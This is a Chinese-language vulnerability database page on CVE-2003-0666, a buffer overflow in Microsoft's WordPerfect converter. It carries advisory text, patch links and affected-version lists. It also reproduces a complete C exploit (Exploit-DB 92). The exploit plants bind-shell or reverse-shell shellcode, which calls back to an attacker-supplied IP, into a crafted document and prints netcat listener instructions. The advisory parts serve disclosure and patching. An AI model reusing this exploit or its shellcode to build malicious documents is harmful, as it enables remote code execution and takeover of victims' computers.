CVE-2003-0666
CVSS7.5
发布时间 :2003-10-20 00:00:00
修订时间 :2016-10-17 22:36:27
NMCOES    

[原文]Buffer overflow in Microsoft Wordperfect Converter allows remote attackers to execute arbitrary code via modified data offset and data size parameters in a Corel WordPerfect file.


[CNNVD]Microsoft WordPerfect转换器远程缓冲区溢出漏洞(MS03-036)(CNNVD-200310-033)

        
        Microsoft Office提供多个转换器允许用户导入和编辑原来不属于Office格式的文件。这些转换器是Office默认安装的一部分,也可以独立存在于Microsoft Office Converter Pack中,这些转换器可以方便的应用于Office早期版本和其他应用系统复杂的环境中,包括Macintosh和第三方应用程序。
        Microsoft WordPerfect转换器打开文档时未能正确验证部分参数,远程攻击者可以利用这个漏洞构建恶意WordPerfect文档,诱使用户打开,可触发缓冲区溢出。
        当解析WordPerfect文件时,WordPerfect转换器拷贝.doc文件中的数据存储在本地缓冲区中,如果修改.doc文件中的部分字节,就可以指定数据偏移和数据大小,WordPerfect转换器由于没有正确检查包含在.doc文件中的数据大小,拷贝文件中数据到本地缓冲区中时,可导致缓冲区溢出,精心构建恶意WordPerfect文件数据,诱使用户打开,可能以用户权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0666
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0666
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-033
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0092.html
(VENDOR_ADVISORY)  VULNWATCH  20030903 EEYE: Microsoft WordPerfect Document Converter Buffer Overflow
http://marc.info/?l=bugtraq&m=106261952827573&w=2
(UNKNOWN)  BUGTRAQ  20030903 EEYE: Microsoft WordPerfect Document Converter Buffer Overflow
http://marc.info/?l=bugtraq&m=106279971612961&w=2
(UNKNOWN)  BUGTRAQ  20030905 Microsoft WordPerfect Document Converter Exploit
http://www.microsoft.com/technet/security/bulletin/ms03-036.asp
(VENDOR_ADVISORY)  MS  MS03-036

- 漏洞信息

Microsoft WordPerfect转换器远程缓冲区溢出漏洞(MS03-036)
高危 边界条件错误
2003-10-20 00:00:00 2005-10-20 00:00:00
本地  
        
        Microsoft Office提供多个转换器允许用户导入和编辑原来不属于Office格式的文件。这些转换器是Office默认安装的一部分,也可以独立存在于Microsoft Office Converter Pack中,这些转换器可以方便的应用于Office早期版本和其他应用系统复杂的环境中,包括Macintosh和第三方应用程序。
        Microsoft WordPerfect转换器打开文档时未能正确验证部分参数,远程攻击者可以利用这个漏洞构建恶意WordPerfect文档,诱使用户打开,可触发缓冲区溢出。
        当解析WordPerfect文件时,WordPerfect转换器拷贝.doc文件中的数据存储在本地缓冲区中,如果修改.doc文件中的部分字节,就可以指定数据偏移和数据大小,WordPerfect转换器由于没有正确检查包含在.doc文件中的数据大小,拷贝文件中数据到本地缓冲区中时,可导致缓冲区溢出,精心构建恶意WordPerfect文件数据,诱使用户打开,可能以用户权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS03-036)以及相应补丁:
        MS03-036:Buffer Overrun in WordPerfect Converter Could Allow Code Execution(827103)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS03-036.asp

        补丁下载:
        Office XP, FrontPage 2002, Publisher 2002, Works 2002, and Works 2003:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=EC563DEE-6BFB-431D-B39E-2D672C0C223F&displaylang=en

        Office 2000, FrontPage 2000, Publisher 2000, and Works 2001:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=D3ED4189-315A-411A-A739-F7181310FBA7&displaylang=en

        Office 97 and Word 98(J): 要了解怎样获取Word 97和Word 98(J)信息可参看如下Microsoft Knowledge Base article:
        
        http://support.microsoft.com/default.aspx?scid=kb;en-us;827656

        Microsoft建议用户访问Office更新站点
        http://www.office.microsoft.com/ProductUpdates/default.aspx来检测和安装安全补丁。

- 漏洞信息 (92)

Microsoft WordPerfect Document Converter Exploit (MS03-036) (EDBID:92)
windows remote
2003-09-06 Verified
0 valgasu
N/A [点击下载]
/******************************************************************/
/*   Microsoft WordPerfect Document Converter Buffer Overflow Exploit MS03-036    */
/*                                                                                                                */
/*                                  Exploit with several targets                                         */
/*                                                                                                                */
/*        Find your own return address with :                                                       */
/*            findhex dllname FF D4 (call esp)                                                      */
/*            findhex dllname FF E4 (jmp esp)                                                      */
/*                                                                                                                */
/* Credits :                                                                                                   */
/* vulnerability : Yuji "The Ninja" Ukai                                                              */
/* findhex : Jason Jordan                                                                               */
/* sk scan-associates.net                                                                               */
/* shellcode : metasploit                                                                                */
/* exploit : valgasu - RstAck                                                                           */
/*                                                                                                                */
/******************************************************************/


#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")

/* eip offset for Word 2000 9.0.2812 */
#define EIP_OFFSET 1359

/* eip offset for Word 2000 9.0.4462 SR1 */
//#define EIP_OFFSET 1343


void usage(char *name)
{
printf("\n-- --\n");
printf("-- WordPerfect Document Converter Exploit --\n");
printf("-- --\n\n");
printf("Usage: %s <shell type> <template doc> <os> <port> [<ip>]\n\n", name);
printf("Shell type : 1 - Bind shell (need port)\n");
printf(" 2 - Reverse shell (need ip and port)\n\n");
printf("OS : 1 - Windows 2000 Pro SP3 French\n");
printf(" 2 - Windows NT4 Workstation SP5 French\n");
printf(" 3 - Windows NT4 Workstation SP6 French\n");

exit(1);
}


int main(int argc, char *argv[])
{
unsigned char bindshell[] =
"\x66\x81\xec\x80\x00\x89\xe6\xe8\x4b\x01\x00\x00\x89\x06\xff\x36"
"\x68\x8e\x4e\x0e\xec\xe8\x52\x01\x00\x00\x89\x46\x08\xff\x36\x68"
"\xad\xd9\x05\xce\xe8\x43\x01\x00\x00\x89\x46\x0c\x68\x6c\x6c\x00"
"\x00\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x56\x08\x89"
"\x46\x04\xff\x36\x68\x72\xfe\xb3\x16\xe8\x1e\x01\x00\x00\x89\x46"
"\x10\xff\x36\x68\xef\xce\xe0\x60\xe8\x0f\x01\x00\x00\x89\x46\x14"
"\xff\x76\x04\x68\xcb\xed\xfc\x3b\xe8\xff\x00\x00\x00\x89\x46\x18"
"\xff\x76\x04\x68\xd9\x09\xf5\xad\xe8\xef\x00\x00\x00\x89\x46\x1c"
"\xff\x76\x04\x68\xa4\x1a\x70\xc7\xe8\xdf\x00\x00\x00\x89\x46\x20"
"\xff\x76\x04\x68\xa4\xad\x2e\xe9\xe8\xcf\x00\x00\x00\x89\x46\x24"
"\xff\x76\x04\x68\xe5\x49\x86\x49\xe8\xbf\x00\x00\x00\x89\x46\x28"
"\xff\x76\x04\x68\xe7\x79\xc6\x79\xe8\xaf\x00\x00\x00\x89\x46\x2c"
"\x31\xff\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\xff\x56"
"\x18\x50\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x89\xc3\x57\x57"
"\x68\x02\x00\x22\x11\x89\xe1\x68\x16\x00\x00\x00\x51\x53\xff\x56"
"\x20\x57\x53\xff\x56\x24\x57\x51\x53\xff\x56\x28\x89\xc2\x68\x65"
"\x78\x65\x00\x68\x63\x6d\x64\x2e\x89\x66\x30\x81\xc4\xac\xff\xff"
"\xff\x8d\x3c\x24\x31\xc0\x31\xc9\x80\xc1\x15\xab\xe2\xfd\xc6\x44"
"\x24\x10\x44\xfe\x44\x24\x3d\x89\x54\x24\x48\x89\x54\x24\x4c\x89"
"\x54\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51"
"\x51\xff\x76\x30\x51\xff\x56\x10\x89\xe1\x68\xff\xff\xff\xff\xff"
"\x31\x89\xc1\x57\xff\x56\x14\x56\x64\xa1\x30\x00\x00\x00\x8b\x40"
"\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e\xc2\x04\x00\x53\x55\x56\x57"
"\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18"
"\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc"
"\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c"
"\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c"
"\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d"
"\x5b\xc2\x04\x00";

char revshell[] =
"\x66\x81\xec\x80\x00\x89\xe6\xe8\x10\x01\x00\x00\x89\x06\xff\x36"
"\x68\x8e\x4e\x0e\xec\xe8\x17\x01\x00\x00\x89\x46\x08\xff\x36\x68"
"\xad\xd9\x05\xce\xe8\x08\x01\x00\x00\x89\x46\x0c\x68\x6c\x6c\x00"
"\x00\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x56\x08\x89"
"\x46\x04\xff\x36\x68\x72\xfe\xb3\x16\xe8\xe3\x00\x00\x00\x89\x46"
"\x10\xff\x36\x68\x7e\xd8\xe2\x73\xe8\xd4\x00\x00\x00\x89\x46\x14"
"\xff\x76\x04\x68\xcb\xed\xfc\x3b\xe8\xc4\x00\x00\x00\x89\x46\x18"
"\xff\x76\x04\x68\xd9\x09\xf5\xad\xe8\xb4\x00\x00\x00\x89\x46\x1c"
"\xff\x76\x04\x68\xec\xf9\xaa\x60\xe8\xa4\x00\x00\x00\x89\x46\x20"
"\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\xff\x56\x18\x50"
"\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x89\xc3\xeb\x03\xff\x56"
"\x14\x68\xc0\xa8\x00\xf7\x68\x02\x00\x22\x11\x89\xe1\x6a\x10\x51"
"\x53\xff\x56\x20\x85\xc0\x75\xe6\x68\x63\x6d\x64\x00\x89\x66\x30"
"\x81\xc4\xac\xff\xff\xff\x8d\x3c\x24\x31\xc0\x31\xc9\x80\xe9\xeb" 
"\xab\xe2\xfd\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d\x89\x5c\x24\x48"
"\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51"
"\x51\x6a\x01\x51\x51\xff\x76\x30\x51\xff\x56\x10\x89\xe1\x68\xff"
"\xff\xff\xff\xff\x31\xff\x56\x0c\x89\xc1\xeb\x92\x56\x64\xa1\x30"
"\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e\xc2\x04"
"\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78"
"\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b"
"\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01"
"\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0"
"\x89\xea\x5f\x5e\x5d\x5b\xc2\x04\x00";


FILE *docfile;
unsigned short port;
const char *eip;
char targetos[255];
int i;
int bshell;


if (argc <5) {
usage(argv[0]);
} 

printf("\n-- --\n");
printf("-- WordPerfect Document Converter Exploit --\n");
printf("-- --\n\n");


/* Shell type */
switch(atoi(argv[1])) {
case 1 : printf("-- Shell type : bind shell\n");
bshell = 1;
break;

case 2 : printf("-- Shell type : reverse shell\n");
bshell = 0;
break;

default : printf("-- Shell type : unknown\n");
exit(1);
}


/* Open template file */
if( (docfile = fopen(argv[2], "r+b")) == NULL) {
printf("-- Can't open file %s\n", argv[2]);

exit(1);
} 
else {
printf("-- Template file : \"%s\"\n", argv[2]);
}


/* Customize shellcode */
port = htons(atoi(argv[4])); 

if(bshell) {
*(unsigned short *)&bindshell[227] = port;
printf("-- Port : %d\n", atoi(argv[4]));
}
else {
*(unsigned short *)&revshell[185] = port;
printf("-- Port : %d\n", atoi(argv[4]));

*(unsigned int *)&revshell[178] = inet_addr(argv[5]);
printf("-- IP : %s\n", argv[5]);
}

/* Set the return address */
switch(atoi(argv[3])) {
// Windows 2000 Pro SP3 - French
case 1 : sprintf(targetos, "Windows 2000 Pro SP3 - French");
eip = "\xA7\x88\xE2\x77";
break;

// Windows NT4 Workstation SP5 - French
case 2 : sprintf(targetos, "Windows NT4 Workstation SP5 - French");
eip = "\x10\x45\xEB\x77";
break;

// Windows NT4 Workstation SP6 - French
case 3 : sprintf(targetos, "Windows NT4 Workstation SP6 - French");
eip = "\x36\x28\xF3\x77";
break;

// Add your own return address here

default : printf("-- Target OS : unknown\n");
exit(1);
}

printf("-- Target OS : %s\n", targetos);

fseek(docfile, EIP_OFFSET, SEEK_SET);
fwrite(eip, sizeof(eip), 1, docfile);

// Put some nop
for (i=0;i<24;i++) {
fseek(docfile, EIP_OFFSET + 4 + i, SEEK_SET);
fwrite("\x90", sizeof(char), 1, docfile);
}

// Put our shellcode
fseek(docfile, EIP_OFFSET + 28, SEEK_SET);

if(bshell) {
fwrite(bindshell, sizeof(bindshell), 1, docfile);
}
else {
fwrite(revshell, sizeof(revshell), 1, docfile);
}

fclose(docfile);

printf("-- Status : template file modified\n");

if(bshell) {
printf("-- After document execution : nc <ip> %d\n", atoi(argv[4]));
}
else {
printf("-- Before document execution : nc -l -p %d\n", atoi(argv[4]));
}

return 0;
}


// milw0rm.com [2003-09-06]
		

- 漏洞信息 (23096)

Microsoft WordPerfect Converter Buffer Overrun Vulnerability (EDBID:23096)
windows local
2003-09-03 Verified
0 valgasu
N/A [点击下载]
source: http://www.securityfocus.com/bid/8538/info

The Microsoft WordPerfect Converter, which ships with Office and a number of other products, is prone to a buffer overrun vulnerability. This could result in execution of malicious, attacker-supplied code when a document with malformed parameters is processed by the component. Exploitation would permit an attacker to execute arbitrary code with the privileges of the user opening the malformed document. 

http://www.exploit-db.com/sploits/23096.zip		

- 漏洞信息

10006
Microsoft WordPerfect Converter Corel File Multiple Parameter Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in Microsoft WordPerfect Converter. WordPerfect converter is installed by default in many Microsoft Office products and is invoked in Internet Explorer when needed to convert a Corel WordPerfect file. The WordPerfect Converter fails to do correct bounds checking on modified data offset and data size parameters resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code on the victim's computer resulting in a loss of integrity.

- 时间线

2003-09-03 Unknow
2003-09-03 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft WordPerfect Converter Buffer Overrun Vulnerability
Boundary Condition Error 8538
No Yes
2003-09-03 12:00:00 2009-07-11 11:56:00
Vulnerability discovery credited to Yuji "The Ninja" Ukai.

- 受影响的程序版本

Microsoft Works Suite 2004
Microsoft Works Suite 2003
Microsoft Works Suite 2002
Microsoft Works Suite 2001
Microsoft Publisher 2002
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
Microsoft Publisher 2000
Microsoft Office XP SP2
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
Microsoft Office XP SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Office XP
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Office 2000 SP3
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
Microsoft Office 2000 SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Office 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Internet Explorer for Unix SP2
Microsoft FrontPage 2002 SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft FrontPage 2002
+ Microsoft Office XP
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft FrontPage 2000 SP2
Microsoft FrontPage 2000 SP1
Microsoft FrontPage 2000
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0

- 漏洞讨论

The Microsoft WordPerfect Converter, which ships with Office and a number of other products, is prone to a buffer overrun vulnerability. This could result in execution of malicious, attacker-supplied code when a document with malformed parameters is processed by the component. Exploitation would permit an attacker to execute arbitrary code with the privileges of the user opening the malformed document.

- 漏洞利用

It has been reported that researcher who discovered this vulnerability has developed a working exploit, but will not be publicly released.

The following exploit was also submitted by "Valgasu" &lt;valgasu@rstack.org&gt;:

- 解决方案

Microsoft has made fixes available to address this issue:


Microsoft Publisher 2000

Microsoft Publisher 2002

Microsoft FrontPage 2002 SP1

Microsoft FrontPage 2000 SP1

Microsoft Works Suite 2003

Microsoft Office 2000 SP2

Microsoft Works Suite 2002

Microsoft FrontPage 2000

Microsoft Office XP SP2

Microsoft FrontPage 2002

Microsoft Office 2000 SP3

Microsoft Works Suite 2001

Microsoft Internet Explorer for Unix SP2

Microsoft FrontPage 2000 SP2

Microsoft Office 2000

Microsoft Office XP SP1

Microsoft Office XP

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站